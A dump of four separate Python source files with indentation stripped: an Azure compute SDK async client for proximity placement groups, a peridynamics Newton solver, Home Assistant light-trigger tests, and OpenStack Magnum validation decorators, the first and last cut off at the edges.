:return: ProximityPlacementGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ProximityPlacementGroup')
request = build_create_or_update_request(
resource_group_name=resource_group_name,
proximity_placement_group_name=proximity_placement_group_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'} # type: ignore
@distributed_trace_async
async def update(
self,
resource_group_name: str,
proximity_placement_group_name: str,
parameters: "_models.ProximityPlacementGroupUpdate",
**kwargs: Any
) -> "_models.ProximityPlacementGroup":
"""Update a proximity placement group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param proximity_placement_group_name: The name of the proximity placement group.
:type proximity_placement_group_name: str
:param parameters: Parameters supplied to the Update Proximity Placement Group operation.
:type parameters: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroupUpdate
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProximityPlacementGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ProximityPlacementGroupUpdate')
request = build_update_request(
resource_group_name=resource_group_name,
proximity_placement_group_name=proximity_placement_group_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'} # type: ignore
@distributed_trace_async
async def delete(
self,
resource_group_name: str,
proximity_placement_group_name: str,
**kwargs: Any
) -> None:
"""Delete a proximity placement group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param proximity_placement_group_name: The name of the proximity placement group.
:type proximity_placement_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
resource_group_name=resource_group_name,
proximity_placement_group_name=proximity_placement_group_name,
subscription_id=self._config.subscription_id,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
proximity_placement_group_name: str,
include_colocation_status: Optional[str] = None,
**kwargs: Any
) -> "_models.ProximityPlacementGroup":
"""Retrieves information about a proximity placement group .
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param proximity_placement_group_name: The name of the proximity placement group.
:type proximity_placement_group_name: str
:param include_colocation_status: includeColocationStatus=true enables fetching the colocation
status of all the resources in the proximity placement group.
:type include_colocation_status: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProximityPlacementGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
proximity_placement_group_name=proximity_placement_group_name,
subscription_id=self._config.subscription_id,
include_colocation_status=include_colocation_status,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'} # type: ignore
@distributed_trace
def list_by_subscription(
self,
**kwargs: Any
) -> AsyncIterable["_models.ProximityPlacementGroupListResult"]:
"""Lists all proximity placement groups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProximityPlacementGroupListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
template_url=self.list_by_subscription.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ProximityPlacementGroupListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/proximityPlacementGroups'} # type: ignore
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ProximityPlacementGroupListResult"]:
"""Lists all proximity placement groups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProximityPlacementGroupListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ProximityPlacementGroupListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups'} # type: ignore
| |
#-*- coding: utf-8 -*-
#@author: ilyass.tabiai@polymtl.ca
#@author: rolland.delorme@polymtl.ca
#@author: patrick.diehl@polymtl.ca
import numpy as np
from ..util import neighbor
from scipy.sparse import linalg
from scipy import sparse
from ..util import linalgebra
from ..util import abstractions
## Class to define the peridynamic problem, i.e. applying boundaries conditions to the geometry and solve the problem
class PD_problem(abstractions.Problem):
## Constructor
# @param deck The input deck
def __init__(self, deck):
## Family of each node
self.neighbors = neighbor.NeighborSearch(deck)
## Nodes' positions stored for each time step
self.y = np.zeros((deck.num_nodes, deck.dim, deck.time_steps), dtype=np.float64)
self.y[:,:,0] = deck.geometry.nodes[:,:]
## Global internal force density array storing the force density attached to each node
self.force_int = np.zeros((deck.num_nodes, deck.dim, deck.time_steps), dtype=np.float64)
## Extension state at each node between the node and its family
self.ext = np.zeros( ( deck.num_nodes, self.neighbors.max_neighbors, deck.time_steps ), dtype=np.float64 )
## Strain energy at each node between the node and its family
self.strain_energy = np.zeros( ( deck.num_nodes, deck.time_steps ), dtype=np.float64 )
if deck.material_type == "Viscoelastic":
## Viscoelastic part of the extension state at each node between the node and its family
self.ext_visco = np.zeros( ( deck.num_nodes, self.neighbors.max_neighbors, len(deck.relax_time), deck.time_steps ), dtype=np.float64 )
## Compute the external force density "b" applied on each node
self.compute_b(deck)
# Compute the volume correction factor for each node
self.compute_volume_correction(deck)
# Compute the weighted volume for each node
self.compute_weighted_volume(deck)
## Compute the external force density "b" applied on each node
# @param deck The input deck
def compute_b(self, deck):
## External force density "b" applied on each node
self.b = np.zeros((deck.num_nodes, deck.dim, deck.time_steps),dtype=np.float64)
for t_n in range(1, deck.time_steps):
for con in deck.conditions:
if con.type == "Force":
if con.shape == "Ramp":
#Madenci approach
for i in con.id:
# x direction
if con.direction == 1:
self.b[int(i), 0, t_n] = self.shape_loading( deck, t_n , con , i )
# y direction
if con.direction == 2:
self.b[int(i), 1 , t_n] = self.shape_loading( deck, t_n , con , i )
# z direction
if con.direction == 3:
self.b[int(i), 2, t_n] = self.shape_loading( deck, t_n , con , i )
#print self.b
## Provide the loading shape
# @param deck The input deck
# @param t_n Id of the time step
# @param con Type of loading, "Force" or "Displacement"
# @param i Id of Node "i"
def shape_loading(self, deck, t_n, con, i):
Time_t = deck.delta_t*(t_n)
if deck.shape_type == "Ramp":
if con.type == "Force":
value = con.value / deck.geometry.volumes[int(i)]
if con.type == "Displacement":
value = con.value
if Time_t <= deck.shape_values[0]:
result = (value*Time_t)/deck.shape_values[0]
return result
elif Time_t > deck.shape_values[0] and Time_t <= deck.shape_values[1]:
result = value
return result
elif Time_t > deck.shape_values[1] and Time_t <= deck.shape_values[2]:
result = value - value*(Time_t - deck.shape_values[1])/(deck.shape_values[2] - deck.shape_values[1])
return result
else:
result = 0
return result
## Provide the internal force density for each node for a given time step t_n
# @param deck The input deck
# @param ysolver Initial guess for Actual nodes' position
# @param t_n Id of the time step
# @return Internal force density for each node
def internal_force(self, deck, ysolver, t_n):
# Choice of the material class
if deck.material_type == "Elastic":
from ..materials.elastic import Elastic_material
## Data from the material class
self.mat_class = Elastic_material( deck, self, ysolver )
self.update_force_data(self.mat_class, t_n)
self.update_ext_state_data(self.mat_class, t_n)
self.update_strain_energy_data(self.mat_class, t_n)
elif deck.material_type == "Viscoelastic":
from ..materials.viscoelastic import Viscoelastic_material
self.mat_class = Viscoelastic_material( deck, self, ysolver, t_n)
self.update_force_data(self.mat_class, t_n)
self.update_ext_state_data(self.mat_class, t_n)
self.update_ext_state_visco_data(self.mat_class, t_n)
force = self.mat_class.f_int
#internal_force = np.reshape(internal_force, (deck.num_nodes * deck.dim,-1) )
return force
## Provide the residual for each node after a solving step for a given time step t_n
# @param deck The input deck
# @param ysolver Initial guess for Actual nodes' position
# @param t_n Id of the time step
# @return Residual for each node
def residual_vector(self, deck, ysolver, t_n):
residual = np.zeros((deck.num_nodes, deck.dim),dtype=np.float64)
internal_force = self.internal_force(deck, ysolver, t_n)
for con in deck.conditions:
if con.type == "Displacement" and con.shape == "Fixed":
for id_node in con.id:
# x direction
if con.direction == 1:
ysolver[int(id_node),0] = deck.geometry.nodes[int(id_node),0] + con.value
# y direction
if con.direction == 2:
ysolver[int(id_node),1] = deck.geometry.nodes[int(id_node),1] + con.value
# z direction
if con.direction == 3:
ysolver[int(id_node),2] = deck.geometry.nodes[int(id_node),2] + con.value
if con.type == "Displacement" and con.shape == "Ramp":
for i in con.id:
# x direction
if con.direction == 1:
ysolver[int(id_node),0] = self.shape_loading( deck, t_n , con , i )
# y direction
if con.direction == 2:
ysolver[int(id_node),1] = self.shape_loading( deck, t_n , con , i )
# z direction
if con.direction == 3:
ysolver[int(id_node),2] = self.shape_loading( deck, t_n , con , i )
for i in range(0,deck.num_nodes):
found = False
for con in deck.conditions:
if con.type == "Displacement":
if i in con.id:
found = True
if found == False:
residual[i,:] = internal_force[i,:] + self.b[i,:, t_n]
return residual
## Provide the Jacobian (stiffness) matrix for a given time step t_n for the Newton's method
# @param deck The input deck
# @param ysolver Initial guess for Actual nodes' position
# @param t_n Id of the time step
# @param perturbation_factor Magnitude of the perturbation factor
# @return Jacobian matrix
def jacobian_matrix(self, deck, ysolver, t_n, perturbation_factor):
eps = perturbation_factor * deck.delta_X
jacobian = np.zeros((deck.num_nodes * deck.dim , deck.num_nodes * deck.dim),dtype=np.float64)
#ids = []
#for con in deck.conditions:
# if con.type == "Displacement":
# for i in con.id:
# ids.append(i)
for i in range(0, deck.num_nodes):
traversal_list = np.append([i],self.neighbors.get_index_x_family(i))
for j in traversal_list :
for r in range(0, deck.dim):
eps_vector = np.zeros((deck.num_nodes , deck.dim),dtype=np.float64)
eps_vector[j,r] = eps
force_int_p = self.internal_force(deck, ysolver + eps_vector, t_n)[i,:]
force_int_m = self.internal_force(deck, ysolver - eps_vector, t_n)[i,:]
force_int_diff = (force_int_p - force_int_m)
del force_int_p;
del force_int_m;
for s in range(0, deck.dim):
if r==s:
jacobian[i*deck.dim+r,j*deck.dim+s] = force_int_diff[r] / (2.*eps)
#print "Jacobian Matrix Density =", np.count_nonzero(jacobian) / (float(deck.num_nodes) * float(deck.dim))**2 * 100., "%"
return jacobian
## Provide the displacement increment resulting for the Newton's method, for each node for a given time step t_n
# @param deck The input deck
# @param ysolver Initial guess for Actual nodes' position
# @param t_n Id of the time step
# @param perturbation_factor Magnitude of the perturbation factor
# @param residual Residual for each node resulting from a solving step
# @return Displacement increment for each node
def newton_step(self, deck, ysolver, t_n, perturbation_factor, residual):
jacobian = self.jacobian_matrix(deck, ysolver, t_n, perturbation_factor)
residual = np.reshape(residual,(deck.dim*deck.num_nodes,1))
removeId = []
for con in deck.conditions:
if con.type == "Displacement":
for i in con.id:
removeId.append(int((i*deck.dim) + con.direction-1))
removeId.sort()
jacobian = np.delete(jacobian,removeId,0)
jacobian = np.delete(jacobian,removeId,1)
residual = np.delete(residual,removeId,0)
#delta_y = linalg.solve(jacobian, -residual, check_finite = "False", assume_a = "sym" )
#delta_y = linalg.solve(jacobian, -residual, check_finite = "False")
s = sparse.csr_matrix(jacobian)
delta_y = linalg.spsolve(s, -residual)
mask = np.ones((deck.num_nodes * deck.dim), dtype=bool)
mask[removeId] = False
result = np.zeros((deck.num_nodes * deck.dim),dtype=np.float64)
i = 0
j = 0
for m in mask:
if m == True:
result[int(i)] = delta_y[int(j)]
j+= 1
i += 1
return np.reshape(result, (deck.num_nodes,deck.dim))
## Solve the peridynamic problem at each time step using the Newton's method to obtain the actual nodes' position
# @param deck The input deck
# @param ysolver Initial guess for Actual nodes' position
def quasi_static_solver(self, deck, ysolver):
for t_n in range(1, deck.time_steps):
res = float('inf')
iteration = 1
residual = self.residual_vector(deck, ysolver, t_n)
res = linalgebra.norm(residual)
while res >= deck.solver_tolerance and iteration <= deck.solver_max_it :
print ("iteration", iteration , res)
if iteration == deck.solver_max_it:
print ("Warning: Solver reached limit of " + str(deck.solver_max_it) + " iterations")
delta_y = self.newton_step(deck, ysolver, t_n, deck.solver_perturbation, residual)
ysolver += delta_y
residual = self.residual_vector(deck, ysolver, t_n)
res = linalgebra.norm(residual)
iteration += 1
self.y[:,:,t_n] = ysolver
print ("t_n:" , t_n , "res:" , res , "Iteration #",iteration-1)
## Store the internal force density for each node at each time step
# @param mat_class Data from the material class
# @param t_n Id of the time step
def update_force_data(self, mat_class, t_n):
# Global internal force density array storing the force density attached to each node
self.force_int[:,:, t_n] = mat_class.f_int
## Store the extension state for each node between itself and its family at each time step
# @param mat_class Data from the material class
# @param t_n Id of the time step
def update_ext_state_data(self, mat_class, t_n):
# Extension state at each node between the node and its family
self.ext[:, :, t_n] = mat_class.e
## Store the viscoelastic part of the extension state for each node between itself and its family
# @param mat_class Data from the material class
# @param t_n Id of the time step
def update_ext_state_visco_data(self, mat_class, t_n):
# Viscoelastic part of the extension state at each node between the node and its family
self.ext_visco[:, :, :, t_n] = mat_class.e_visco
## Store the strain energy for each node between itself and its family
# @param mat_class Data from the material class
# @param t_n Id of the time step
def update_strain_energy_data(self, mat_class, t_n):
# Viscoelastic part of the extension state at each node between the node and its family
self.strain_energy[:, t_n] = mat_class.strain_energy
## Provide the strain between 2 nodes
# @param deck The input deck
# @param id_Node_1 Id of the 1st node
# @param id_Node_2 Id of the 2nd node
def strain_calculation(self, deck, id_Node_1, id_Node_2):
strain = np.zeros( ( deck.time_steps ),dtype=np.float64 )
for t_n in range(1, deck.time_steps):
actual = linalgebra.norm(self.y[id_Node_2,:,t_n] - self.y[id_Node_1,:,t_n])
initial = linalgebra.norm(deck.geometry.nodes[id_Node_2,:] - deck.geometry.nodes[id_Node_1,:])
strain[t_n] = (actual - initial) / initial
return strain
| |
"""The test for light device automation."""
from datetime import timedelta
import pytest
import homeassistant.components.automation as automation
from homeassistant.components.light import DOMAIN
from homeassistant.const import CONF_PLATFORM, STATE_OFF, STATE_ON
from homeassistant.helpers import device_registry
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
MockConfigEntry,
async_fire_time_changed,
async_get_device_automation_capabilities,
async_get_device_automations,
async_mock_service,
mock_device_registry,
mock_registry,
)
@pytest.fixture
def device_reg(hass):
"""Return an empty, loaded, registry."""
return mock_device_registry(hass)
@pytest.fixture
def entity_reg(hass):
"""Return an empty, loaded, registry."""
return mock_registry(hass)
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
async def test_get_triggers(hass, device_reg, entity_reg):
"""Test we get the expected triggers from a light."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device_entry.id)
expected_triggers = [
{
"platform": "device",
"domain": DOMAIN,
"type": "turned_off",
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
},
{
"platform": "device",
"domain": DOMAIN,
"type": "turned_on",
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
},
]
triggers = await async_get_device_automations(hass, "trigger", device_entry.id)
assert triggers == expected_triggers
async def test_get_trigger_capabilities(hass, device_reg, entity_reg):
"""Test we get the expected capabilities from a light trigger."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device_entry.id)
expected_capabilities = {
"extra_fields": [
{"name": "for", "optional": True, "type": "positive_time_period_dict"}
]
}
triggers = await async_get_device_automations(hass, "trigger", device_entry.id)
for trigger in triggers:
capabilities = await async_get_device_automation_capabilities(
hass, "trigger", trigger
)
assert capabilities == expected_capabilities
async def test_if_fires_on_state_change(hass, calls):
"""Test for turn_on and turn_off triggers firing."""
platform = getattr(hass.components, f"test.{DOMAIN}")
platform.init()
assert await async_setup_component(hass, DOMAIN, {DOMAIN: {CONF_PLATFORM: "test"}})
await hass.async_block_till_done()
ent1, ent2, ent3 = platform.ENTITIES
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": ent1.entity_id,
"type": "turned_on",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_on {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": ent1.entity_id,
"type": "turned_off",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
]
},
)
await hass.async_block_till_done()
assert hass.states.get(ent1.entity_id).state == STATE_ON
assert len(calls) == 0
hass.states.async_set(ent1.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "turn_off device - {} - on - off - None".format(
ent1.entity_id
)
hass.states.async_set(ent1.entity_id, STATE_ON)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "turn_on device - {} - off - on - None".format(
ent1.entity_id
)
async def test_if_fires_on_state_change_with_for(hass, calls):
"""Test for triggers firing with delay."""
platform = getattr(hass.components, f"test.{DOMAIN}")
platform.init()
assert await async_setup_component(hass, DOMAIN, {DOMAIN: {CONF_PLATFORM: "test"}})
await hass.async_block_till_done()
ent1, ent2, ent3 = platform.ENTITIES
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": ent1.entity_id,
"type": "turned_off",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
}
]
},
)
await hass.async_block_till_done()
assert hass.states.get(ent1.entity_id).state == STATE_ON
assert len(calls) == 0
hass.states.async_set(ent1.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
await hass.async_block_till_done()
assert calls[0].data["some"] == "turn_off device - {} - on - off - 0:00:05".format(
ent1.entity_id
)
| |
# Copyright 2015 Huawei Technologies Co.,LTD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import decorator
import pecan
from keystoneauth1 import exceptions as ka_exception
from magnum.api import utils as api_utils
from magnum.common import clients
from magnum.common import exception
import magnum.conf
from magnum.drivers.common import driver
from magnum.i18n import _
from magnum import objects
CONF = magnum.conf.CONF
cluster_update_allowed_properties = set(['node_count', 'health_status',
'health_status_reason'])
federation_update_allowed_properties = set(['member_ids', 'properties'])
def ct_not_found_to_bad_request():
@decorator.decorator
def wrapper(func, *args, **kwargs):
try:
return func(*args, **kwargs)
except exception.ClusterTemplateNotFound as e:
# Change error code because 404 (NotFound) is inappropriate
# response for a POST request to create a Cluster
e.code = 400 # BadRequest
raise
return wrapper
def enforce_cluster_type_supported():
@decorator.decorator
def wrapper(func, *args, **kwargs):
cluster = args[1]
cluster_template = objects.ClusterTemplate.get(
pecan.request.context, cluster.cluster_template_id)
cluster_type = (cluster_template.server_type,
cluster_template.cluster_distro,
cluster_template.coe)
driver.Driver.get_driver(*cluster_type)
return func(*args, **kwargs)
return wrapper
def enforce_driver_supported():
@decorator.decorator
def wrapper(func, *args, **kwargs):
cluster_template = args[1]
cluster_distro = cluster_template.cluster_distro
if not cluster_distro:
try:
cli = clients.OpenStackClients(pecan.request.context)
image_id = cluster_template.image_id
image = api_utils.get_openstack_resource(cli.glance().images,
image_id,
'images')
cluster_distro = image.get('os_distro')
except Exception:
pass
cluster_type = (cluster_template.server_type,
cluster_distro,
cluster_template.coe)
driver.Driver.get_driver(*cluster_type)
return func(*args, **kwargs)
return wrapper
def enforce_cluster_volume_storage_size():
@decorator.decorator
def wrapper(func, *args, **kwargs):
cluster = args[1]
cluster_template = objects.ClusterTemplate.get(
pecan.request.context, cluster.cluster_template_id)
_enforce_volume_storage_size(
cluster_template.as_dict(), cluster.as_dict())
return func(*args, **kwargs)
return wrapper
def enforce_valid_project_id_on_create():
@decorator.decorator
def wrapper(func, *args, **kwargs):
quota = args[1]
_validate_project_id(quota.project_id)
return func(*args, **kwargs)
return wrapper
def _validate_project_id(project_id):
try:
context = pecan.request.context
osc = clients.OpenStackClients(context)
osc.keystone().domain_admin_client.projects.get(project_id)
except ka_exception.http.NotFound:
raise exception.ProjectNotFound(name='project_id',
id=project_id)
def enforce_network_driver_types_create():
@decorator.decorator
def wrapper(func, *args, **kwargs):
cluster_template = args[1]
_enforce_network_driver_types(cluster_template)
return func(*args, **kwargs)
return wrapper
def enforce_network_driver_types_update():
@decorator.decorator
def wrapper(func, *args, **kwargs):
cluster_template_ident = args[1]
patch = args[2]
cluster_template = api_utils.get_resource('ClusterTemplate',
cluster_template_ident)
try:
cluster_template_dict = api_utils.apply_jsonpatch(
cluster_template.as_dict(), patch)
except api_utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
cluster_template = objects.ClusterTemplate(pecan.request.context,
**cluster_template_dict)
_enforce_network_driver_types(cluster_template)
return func(*args, **kwargs)
return wrapper
def _enforce_network_driver_types(cluster_template):
validator = Validator.get_coe_validator(cluster_template.coe)
if not cluster_template.network_driver:
cluster_template.network_driver = validator.default_network_driver
validator.validate_network_driver(cluster_template.network_driver)
def enforce_server_type():
@decorator.decorator
def wrapper(func, *args, **kwargs):
cluster_template = args[1]
_enforce_server_type(cluster_template)
return func(*args, **kwargs)
return wrapper
def _enforce_server_type(cluster_template):
validator = Validator.get_coe_validator(cluster_template.coe)
validator.validate_server_type(cluster_template.server_type)
def enforce_volume_driver_types_create():
@decorator.decorator
def wrapper(func, *args, **kwargs):
cluster_template = args[1]
_enforce_volume_driver_types(cluster_template.as_dict())
return func(*args, **kwargs)
return wrapper
def enforce_volume_storage_size_create():
@decorator.decorator
def wrapper(func, *args, **kwargs):
cluster_template = args[1]
_enforce_volume_storage_size(cluster_template.as_dict(), {})
return func(*args, **kwargs)
return wrapper
def enforce_volume_driver_types_update():
@decorator.decorator
def wrapper(func, *args, **kwargs):
cluster_template_ident = args[1]
patch = args[2]
cluster_template = api_utils.get_resource('ClusterTemplate',
cluster_template_ident)
try:
cluster_template_dict = api_utils.apply_jsonpatch(
cluster_template.as_dict(), patch)
except api_utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
_enforce_volume_driver_types(cluster_template_dict)
return func(*args, **kwargs)
return wrapper
def _enforce_volume_driver_types(cluster_template):
validator = Validator.get_coe_validator(cluster_template['coe'])
if not cluster_template.get('volume_driver'):
return
validator.validate_volume_driver(cluster_template['volume_driver'])
def _enforce_volume_storage_size(cluster_template, cluster):
volume_size = cluster.get('docker_volume_size') \
or cluster_template.get('docker_volume_size')
storage_driver = cluster_template.get('docker_storage_driver')
